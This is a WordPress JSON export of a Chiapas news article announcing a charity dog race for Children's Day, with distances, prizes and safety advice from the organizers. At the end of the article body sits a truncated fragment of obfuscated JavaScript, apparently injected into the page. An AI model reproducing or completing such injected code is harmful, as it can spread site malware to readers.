{"id":9668,"date":"2023-04-21T03:07:25","date_gmt":"2023-04-21T03:07:25","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9668"},"modified":"2023-04-21T03:07:37","modified_gmt":"2023-04-21T03:07:37","slug":"anuncian-perroton-en-san-cristobal-en-el-marco-del-dia-de-la-ninez","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9668","title":{"rendered":"Anuncian Perrot\u00f3n en San Crist\u00f3bal en el marco del D\u00eda de la Ni\u00f1ez"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"592\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-20-at-4.17.51-PM-1024x592.jpeg\" alt=\"\" class=\"wp-image-9669\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-20-at-4.17.51-PM-1024x592.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-20-at-4.17.51-PM-300x173.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-20-at-4.17.51-PM-768x444.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-20-at-4.17.51-PM.jpeg 1074w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- En el marco de la celebraci\u00f3n del D\u00eda de la Ni\u00f1ez se llevar\u00e1 a cabo el Segundo Perrot\u00f3n con Causa, en San Felipe Ecatepec, a partir de las 9 horas, informaron sus coordinadores Geraldine Flores y Carlos G\u00f3mez, quienes dieron a conocer que el evento es con la finalidad de recolectar juguetes no b\u00e9licos para que sean entregados a menores de escasos recursos econ\u00f3micos.<\/p>\n\n\n\n<p>En entrevista, comentaron que esto lo hacen por iniciativa propia, y lo hacen con causa para beneficiar a menores de escasos recursos, lo cual tendr\u00e1 lugar en San Felipe Ecatepec, en punto de las 9 horas en el domingo 29 de abril, &#8220;primero ser\u00e1n las inscripciones, porque tendremos una rifa por parte de un patrocinador y para participar ser\u00e1 con el n\u00famero del competidor&#8221;.<\/p>\n\n\n\n<p>&#8220;El Perrot\u00f3n consiste en correr al lado de nuestro perro, es una carrera en conjunto tienen que ir los dos desde el inicio hasta el fin, van haber 3 categor\u00edas, razas peque\u00f1as, medianas y grandes, las peque\u00f1as van a correr 3 kil\u00f3metros, las medianas 4 y las grandes 5 kil\u00f3metros, la salida va ser en la iglesia de San Felipe con direcci\u00f3n al pante\u00f3n, ya est\u00e1 trazada la ruta&#8221;.<\/p>\n\n\n\n<p>Asimismo, dijo que el a\u00f1o pasado participaron casi 100 participantes, &#8220;en el caso de las razas grandes se pide que lleven bozal y a parte ya en conjunto con los agentes ejidales de San Felipe, ellos nos van a hacer el perifoneo y la atenci\u00f3n por parte de la Polic\u00eda&#8221;.<\/p>\n\n\n\n<p>&#8220;Con la experiencia que tenemos, recomendamos que no nada m\u00e1s corran los ni\u00f1os con sus perros grandes, porque todav\u00eda no tienen la fuerza suficiente para manipular al perro, ya que aunque sean tranquilos, ya con otros perros tienden a cambiar bruscamente, si el ni\u00f1o quiere correr que lo haga con una persona mayor&#8221;, agregaron.<\/p>\n\n\n\n<p>Finalmente, dieron a conocer que se va premiar a los 3 primeros lugares de cada categor\u00eda, el primer lugar 500 pesos, el segundo 300 y el tercero 200, &#8220;al t\u00e9rmino de la carrera gracias a nuestros patrocinadores tenemos una rifa de vales de consumo y aparte habr\u00e1n otras din\u00e1micas para tambi\u00e9n dar unos regalos&#8221;.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- En el marco de la celebraci\u00f3n del D\u00eda de la Ni\u00f1ez se llevar\u00e1 a cabo el Segundo Perrot\u00f3n con Causa, en San Felipe Ecatepec, a partir de las 9 horas, informaron sus coordinadores Geraldine Flores y Carlos G\u00f3mez, quienes dieron a conocer que el evento es con la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9669,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9668","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9668","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9668"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9668\/revisions"}],"predecessor-version":[{"id":9670,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9668\/revisions\/9670"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9669"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}